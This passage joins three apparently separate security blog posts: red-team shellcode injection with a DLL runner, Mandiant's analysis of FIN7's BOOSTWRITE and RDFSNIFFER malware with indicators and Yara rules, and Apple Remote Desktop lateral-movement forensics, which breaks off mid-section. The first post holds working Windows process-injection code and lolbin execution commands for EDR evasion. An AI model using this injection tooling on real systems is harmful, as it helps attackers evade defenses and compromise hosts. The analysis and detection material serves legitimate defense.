Shellcode injection is one technique that red teams and malicious attackers use to avoid detection from EDR products and network defenders. Additionally, many EDR products implement detections based on the expected behavior of Windows processes. For example, an attacker that executes Mimikatz from the context of an arbitrary process, let’s say DefinitelyNotEvil.exe, may get detected or blocked outright because the EDR tool does not expect that process to access lsass.exe. However, by injecting into a Windows process, such as svchost.exe, that regularly touches lsass.exe, it may be possible to bypass these detections because the EDR product sees this as expected behavior.

In this blog post, we’ll cover three different techniques for running shellcode.

  • CreateThread
  • CreateRemoteThread
  • QueueUserAPC

Each of these techniques corresponds to a Windows API function that is responsible for the allocation of a thread to the shellcode, ultimately resulting in the shellcode being run. CreateThread is a technique used for shellcode execution while CreateRemoteThread and QueueUserAPC are forms of shellcode injection.

The following is a high-level outline of the process for running shellcode with each of the three different techniques.

CreateThread
  1. Allocate memory in the current process
  2. Copy shellcode into the allocated memory
  3. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  4. Create a thread with the base address of the allocated memory segment
  5. Wait on the thread handle to return
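As an illustration only (not the DueDLLigence implementation, which is written in C#), a minimal Python ctypes sketch of these five steps could look like the following; the shellcode bytes are a harmless placeholder, and error handling and argtypes declarations are omitted for brevity:

import ctypes
import ctypes.wintypes as wt

kernel32 = ctypes.windll.kernel32
kernel32.VirtualAlloc.restype = ctypes.c_void_p
kernel32.CreateThread.restype = wt.HANDLE

MEM_COMMIT_RESERVE = 0x3000   # MEM_COMMIT | MEM_RESERVE
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
INFINITE = 0xFFFFFFFF

shellcode = b"\xc3"           # placeholder (a lone RET), not a real payload

# 1. Allocate memory in the current process
addr = kernel32.VirtualAlloc(None, len(shellcode), MEM_COMMIT_RESERVE, PAGE_READWRITE)

# 2. Copy shellcode into the allocated memory
ctypes.memmove(addr, shellcode, len(shellcode))

# 3. Modify the protections of the new memory to allow execution
old_protect = wt.DWORD(0)
kernel32.VirtualProtect(ctypes.c_void_p(addr), len(shellcode), PAGE_EXECUTE_READ, ctypes.byref(old_protect))

# 4. Create a thread with the base address of the allocated memory segment
thread = kernel32.CreateThread(None, 0, ctypes.c_void_p(addr), None, 0, None)

# 5. Wait on the thread handle to return
kernel32.WaitForSingleObject(thread, INFINITE)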
CreateRemoteThread
  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate executable memory within the target process
  4. Write shellcode into the allocated memory
  5. Create a thread in the remote process with the start address of the allocated memory segment


Figure 1: Windows API calls for CreateRemoteThread injection
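A similarly hedged ctypes sketch of the CreateRemoteThread steps follows; the target PID is hypothetical, the shellcode is a harmless placeholder, and error handling is again omitted:

import ctypes
import ctypes.wintypes as wt

kernel32 = ctypes.windll.kernel32
kernel32.OpenProcess.restype = wt.HANDLE
kernel32.VirtualAllocEx.restype = ctypes.c_void_p
kernel32.CreateRemoteThread.restype = wt.HANDLE

PROCESS_ALL_ACCESS = 0x001F0FFF
MEM_COMMIT_RESERVE = 0x3000
PAGE_EXECUTE_READWRITE = 0x40

shellcode = b"\xc3"   # placeholder, not a real payload
target_pid = 1234     # hypothetical PID obtained in step 1

# 2. Open the target process
hproc = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_pid)

# 3. Allocate executable memory within the target process
remote_addr = kernel32.VirtualAllocEx(hproc, None, len(shellcode),
                                      MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)

# 4. Write shellcode into the allocated memory
written = ctypes.c_size_t(0)
kernel32.WriteProcessMemory(hproc, ctypes.c_void_p(remote_addr), shellcode,
                            len(shellcode), ctypes.byref(written))

# 5. Create a thread in the remote process with the start address of the allocation
kernel32.CreateRemoteThread(hproc, None, 0, ctypes.c_void_p(remote_addr), None, 0, None)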

QueueUserAPC
  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate memory within the target process
  4. Write shellcode into the allocated memory
  5. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  6. Open a thread in the remote process with the start address of the allocated memory segment
  7. Submit thread to queue for execution when it enters an “alertable” state
  8. Resume thread to enter “alertable” state


Figure 2: Windows API calls for QueueUserAPC injection
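The QueueUserAPC variant can be sketched the same way. In practice tools typically create the target process suspended (as discussed later in this post) and queue the APC to its main thread; here a hypothetical thread ID stands in for step 6, the shellcode is a placeholder, and error handling is omitted:

import ctypes
import ctypes.wintypes as wt

kernel32 = ctypes.windll.kernel32
kernel32.OpenProcess.restype = wt.HANDLE
kernel32.OpenThread.restype = wt.HANDLE
kernel32.VirtualAllocEx.restype = ctypes.c_void_p

PROCESS_ALL_ACCESS = 0x001F0FFF
THREAD_ALL_ACCESS = 0x001FFFFF
MEM_COMMIT_RESERVE = 0x3000
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20

shellcode = b"\xc3"   # placeholder, not a real payload
target_pid = 1234     # hypothetical PID (step 1)
target_tid = 5678     # hypothetical thread ID inside the target process (step 6)

# 2-5. Open the process, allocate RW memory, write the shellcode, then flip it to RX
hproc = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_pid)
remote_addr = kernel32.VirtualAllocEx(hproc, None, len(shellcode), MEM_COMMIT_RESERVE, PAGE_READWRITE)
written = ctypes.c_size_t(0)
kernel32.WriteProcessMemory(hproc, ctypes.c_void_p(remote_addr), shellcode, len(shellcode), ctypes.byref(written))
old_protect = wt.DWORD(0)
kernel32.VirtualProtectEx(hproc, ctypes.c_void_p(remote_addr), len(shellcode), PAGE_EXECUTE_READ, ctypes.byref(old_protect))

# 6. Open a thread in the remote process
hthread = kernel32.OpenThread(THREAD_ALL_ACCESS, False, target_tid)

# 7. Queue the shellcode address as an APC; it runs when the thread enters an alertable state
kernel32.QueueUserAPC(ctypes.c_void_p(remote_addr), hthread, 0)

# 8. Resume the thread so it can enter an alertable state
kernel32.ResumeThread(hthread)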

Command Execution

Let’s break down what we’ve talked about so far:

  • Malicious code is your shellcode – the stage 0 or stage 1 code that is truly going to do the malicious work.
  • Standard “shellcode runner” application which executes your code via either injection or execution. Most everyone writes their own shellcode runner, so we don’t necessarily deem this as true malware; the real malware is the shellcode itself.

Now that we’ve covered all that, we need a method to execute the code you compiled. Generally, this is either an executable (EXE) or a Dynamic Link Library (DLL). The Red Team prefers using Living Off the Land Binaries (lolbins) to execute our compiled code.

The reason we can take advantage of lolbins is because of unmanaged exports. At a high level, when an executable calls a DLL it is looking for a specific export within the DLL to execute the code within that export. If the export is not properly protected, then you can craft your own DLL with the export name you know the executable is looking for and run your arbitrary code, which in this case will be your shellcode runner.

Putting It All Together

We set out to develop a shellcode runner DLL that takes advantage of lolbins through unmanaged exports while also providing the flexibility to execute both injected and non-injected shellcode without a need to update the code base. This effort resulted in a C# shellcode runner called DueDLLigence, for which the source code can be found at the GitHub page.

The DueDLLigence project provides a quick and easy way to switch between different shellcode techniques described previously in this blog post by simply switching out the value of the global variable shown in Figure 3.


Figure 3: Shellcode technique variable

The DueDLLigence DLL contains three unmanaged exports inside of it. These exports can be used with the Rasautou, Control, and MSIExec native Windows commands as described in Figure 4. Note: The shellcode that is in the example will only pop calc.

| Native Windows Executable | Required Export Name | Syntax Used To Run |
| --- | --- | --- |
| Rasautou | Powershell | rasautou -d {full path to dll} -p powershell -a a -e e |
| Control | Cplapplet | Rename the compiled “dll” extension to “cpl” and just double click it! |
| MSIExec | Dllunregisterserver | msiexec /z {full path to dll} |

Figure 4: DueDLLigence execution outline

When you open the source code you will find the example uses the exports shown in Figure 5.


Figure 5: Source code for exported entry points

The first thing you should do is generate your own shellcode. An example of this is shown in Figure 6, where we use Cobalt Strike to generate raw shellcode for the “rev_dns” listener. Once that is complete, we run the base64 -w0 payload.bin > [outputFileName] command in Linux to generate the base64 encoded version of the shellcode as shown in Figure 7.


Figure 6: Shellcode generation


Figure 7: Converting shellcode to base64

Then you simply replace the base64 encoded shellcode on line 58 with the base64'd version of your own x86 or x64 shellcode. The screenshot in Figure 6 generated an x86 payload; you will need to check the “use x64 payload” box to generate an x64 payload.

At this point you should reinstall the Unmanaged Exports library in the DueDLLigence Visual Studio project, because it sometimes does not work properly when reused in a different project. You can reinstall it by opening the NuGet package manager console shown in Figure 8 and running the Install-Package UnmanagedExports -Version 1.2.7 command.


Figure 8: Open NuGet Package Manager

After you have reinstalled the Unmanaged Exports library and replaced the base64 encoded shellcode on line 58, you are ready to compile! Go ahead and build the source and look for your DLL in the bin folder. We strongly suggest that you test your DLL to ensure it has the proper exports associated with it. Visual Studio Pro comes with the Dumpbin.exe utility, which you can run against your DLL to view the exports as shown in Figure 9.


Figure 9: Dumpbin.exe output

You can expand the list as much as you want with more lolbin techniques found over at the GitHub page.

We prefer to remove the unmanaged exports that are not going to be used with the respective payload that was generated so there is a smaller footprint in the payload. In general, this is good tradecraft when crafting payloads or writing code. In our industry we have the principle of least privilege, well this is the principle of least code!

Modern Detections for Shellcode Injection

Despite all the evasive advantages that shellcode offers, there is hope when it comes to detecting shellcode injection. We looked at several different methods for process injection.

In our shellcode runner, the shellcode injection techniques (CreateRemoteThread and QueueUserAPC) spawn a process in a suspended state and then inject shellcode into the running process. Let’s say we choose the process to inject into as explorer.exe and our payload will run with MSIExec. This will create a process tree where cmd.exe will spawn msiexec.exe which will in turn spawn explorer.exe.


Figure 10: Process tree analysis

In an enterprise environment it is possible to collect telemetry data with a SIEM to determine how often, across all endpoints, the cmd.exe -> msiexec.exe -> explorer.exe process tree occurs. Using parent-child process relationships, defenders can identify potential malware through anomaly detection.

API hooking is commonly used by EDR and AV products to monitor for and detect the use of Windows API calls that are commonly used by malware authors. Utilizing kernel routines such as PsSetCreateProcessNotifyRoutine(Ex) and PsSetCreateThreadNotifyRoutine(Ex), security software can monitor when certain API calls are used, such as CreateRemoteThread. Combining this information with other data, such as process reputation and enterprise-wide telemetry, can provide high-fidelity alerts for potential malware.

When process injection occurs, one process modifies the memory protections of a memory region in another process’s address space. Defenders can detect the use of API calls such as VirtualProtectEx that result in one process modifying the memory protections of address space allocated to another process, especially when PAGE_EXECUTE_READWRITE permissions are requested, as this protection allows shellcode to be written to and executed from the same memory region.

As red teamers and malicious actors continue to develop new process injection techniques, network defenders and security software continue to adapt to the ever-changing landscape. Monitoring Windows API function calls such as VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, and NTQueueAPCThread can provide valuable data for identifying potential malware. Monitoring for the use of CreateProcess with the CREATE_SUSPENDED and CREATE_HIDDEN flags may assist in detecting process injection where the attacker creates a suspended and hidden process to inject into.

As we’ve seen, process injection techniques tend to follow a consistent order in which they call Windows API functions. For example, both injection techniques call VirtualAllocEx followed by WriteProcessMemory and identifying when a process calls these two APIs in that order can be used as a basis for detecting process injection.
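To make the ordering idea concrete, here is a small hedged sketch of how one might flag that call sequence in endpoint telemetry; the event format (an ordered list of API call names per process) is an assumption for illustration, not any specific EDR product's schema:

INJECTION_ORDER = ("VirtualAllocEx", "WriteProcessMemory")

def calls_in_order(api_calls, ordered=INJECTION_ORDER):
    # Returns True when the calls appear in the given order (not necessarily
    # consecutively), e.g. VirtualAllocEx followed later by WriteProcessMemory.
    idx = 0
    for call in api_calls:
        if call == ordered[idx]:
            idx += 1
            if idx == len(ordered):
                return True
    return False

# Example telemetry for a single process; a follow-on CreateRemoteThread or
# NtQueueApcThread call would further raise confidence.
events = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"]
assert calls_in_order(events)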

Conclusion

Using shellcode as the final stage for payloads during assessments allows Red Teams the flexibility to execute payloads in a wide array of environments while implementing techniques to avoid detection. The DueDLLigence shellcode runner is a dynamic tool that takes advantage of the evasive properties of both shellcode and process injection to offer Red Teams a way to avoid detection. Detections for the execution of LOLbins on the command line and process injection at the API and process level should be incorporated into defensive methodology, as attackers are increasingly being forced into living off the land with the increased adoption of application whitelisting.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded, the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32 DLLs which, if the tests pass, are loaded into memory without touching the filesystem.
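For analysts who recover the key and IV (for example from a packet capture of the C2 exchange), decryption can be reproduced with any standard ChaCha implementation. The sketch below uses the Python cryptography library and assumes an initial block counter of zero, which is our assumption for illustration; the original (DJB) ChaCha takes a 64-bit nonce plus a 64-bit counter, which the library expects concatenated into a 16-byte nonce:

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms

def chacha_decrypt(key32: bytes, iv8: bytes, blob: bytes) -> bytes:
    # 256-bit key and 64-bit IV, matching the parameters described above.
    # The library wants a 128-bit nonce: 8-byte little-endian counter + 8-byte IV.
    assert len(key32) == 32 and len(iv8) == 8
    nonce = (0).to_bytes(8, "little") + iv8   # assumed zero initial counter
    cipher = Cipher(algorithms.ChaCha20(key32, nonce), mode=None)
    return cipher.decryptor().update(blob)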

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Loading...
Starting...
Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

| Win32 API Function | Hook Description |
| --- | --- |
| CertVerifyCertificateChainPolicy | Used to man-in-the-middle SSL sessions |
| CertGetCertificateChain | Used to man-in-the-middle SSL sessions |
| WSAConnect | Used to man-in-the-middle socket connections |
| connect | Used to man-in-the-middle socket connections |
| ConnectEx | Used to man-in-the-middle socket connections |
| DispatchMessageW | Used to hijack the utility's UI |
| DispatchMessageA | Used to hijack the utility's UI |
| DefWindowProcW | Used to hijack the utility's UI |
| DefWindowProcA | Used to hijack the utility's UI |
| GetLastInputInfo | Used to change the user's last input time (to avoid timed lock outs) |

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

| Command Name | Legit Function in RDFClient | RDFClient Command ID | Description |
| --- | --- | --- | --- |
| Upload | FileMgrSendFile | 107 | Uploads a file to the remote system |
| Download | FileMgrGetFile | 108 | Retrieves a file from the remote system |
| Execute | RunCommand | 3001 | Executes a command on the remote system |
| DeleteRemote | FileMgrDeleteFile | 3019 | Deletes a file on the remote system |
| DeleteLocal | - | - | Deletes a local file |

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).

| MD5 | Organization | Country | Serial |
| --- | --- | --- | --- |
| a67d6e87283c34459b4660f19747a306 | mango ENTERPRISE LIMITED | GB | 32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B |

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).


Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.

| Type | Indicator(s) |
| --- | --- |
| BOOSTWRITE (signed) | MD5: a67d6e87283c34459b4660f19747a306; SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84; SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5; C2: 109.230.199[.]227 |
| BOOSTWRITE (unsigned) | MD5: af2f4142463f42548b8650a3adf5ceb2; SHA-1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1; SHA-256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0; C2: 109.230.199[.]227 |

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.

| Timestamp | Description |
| --- | --- |
| 2019-05-20 09:50:55 UTC | Signed BOOSTWRITE’s PE compilation time |
| 2019-05-22 00:00 UTC through 2020-05-21 23:59 UTC | Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window |

Table 5: Relevant executable timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):
     pe.signatures[i].valid_on(pe.timestamp)

Figure 3: Excerpt of NCC Group’s research Yara rule

There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.



Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.

F:\projects\DWriteImpl\Release\DWriteImpl.pdb

Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE
{
 meta:
     author = "Nick Carr (@itsreallynick)"
     reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
strings:
     $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
 condition:
     (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB
}

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

import "pe"

rule Exports_BOOSTWRITE
{
meta:
     author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
strings:
     $exyPants = "DWriteImpl.dll" nocase
condition:
     uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB
}

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.

| Platform | Signature Name |
| --- | --- |
| Endpoint Security | MalwareGuard ML detection (unsigned variants) |
| Network Security and Email Security | Malware.binary.dll (dynamic detection); MalwareGuard ML detection (unsigned variants); APTFIN.Dropper.Win.BOOSTWRITE (network traffic); APTFIN.Backdoor.Win.RDFSNIFFER (network traffic); FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection); FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection) |

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings

BOOSTWRITE

| ID | Technique | BOOSTWRITE Context |
| --- | --- | --- |
| T1022 | Data Encrypted | BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection |
| T1027 | Obfuscated Files or Information | BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection |
| T1038 | DLL Search Order Hijacking | BOOSTWRITE exploits the application’s loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ DLL |
| T1116 | Code Signing | BOOSTWRITE variants were observed signed by a valid CA |
| T1129 | Execution through Module Load | BOOSTWRITE exploits the application’s loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ DLL |
| T1140 | Deobfuscate/Decode Files or Information | BOOSTWRITE decodes its payloads at runtime using a ChaCha stream cipher with a 256-bit key and 64-bit IV |

RDFSNIFFER

| ID | Technique | RDFSNIFFER Context |
| --- | --- | --- |
| T1106 | Execution through API | RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface |
| T1107 | File Deletion | RDFSNIFFER has the capability of deleting local files |
| T1179 | Hooking | RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface |

Acknowledgements

The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.

An ARD administrator has a substantial amount of power available to them, similar to compromising an administrator account in a Windows environment. By compromising an account that has access to an ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to SQLite database on the administrator system

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the following files, which make up the local client data cache that is periodically reported to the administrator system. Note, however, that these files are routinely deleted from the client system once they are transmitted to the administrator system, so they may not be present; once transmitted, the data is stored on the administrator system.

| File | Description |
| --- | --- |
| AppUsage.plist | plist file containing application usage data |
| AppUsage.tmp | Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist |
| asp.cache | Binary plist of system information |
| filesystem.cache | Database containing an index of the entire file system, including users and groups |
| sysinfo.cache | Binary plist containing system information, some of which is also present in asp.cache |
| UserAcct.tmp | Binary plist containing user login activity |

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

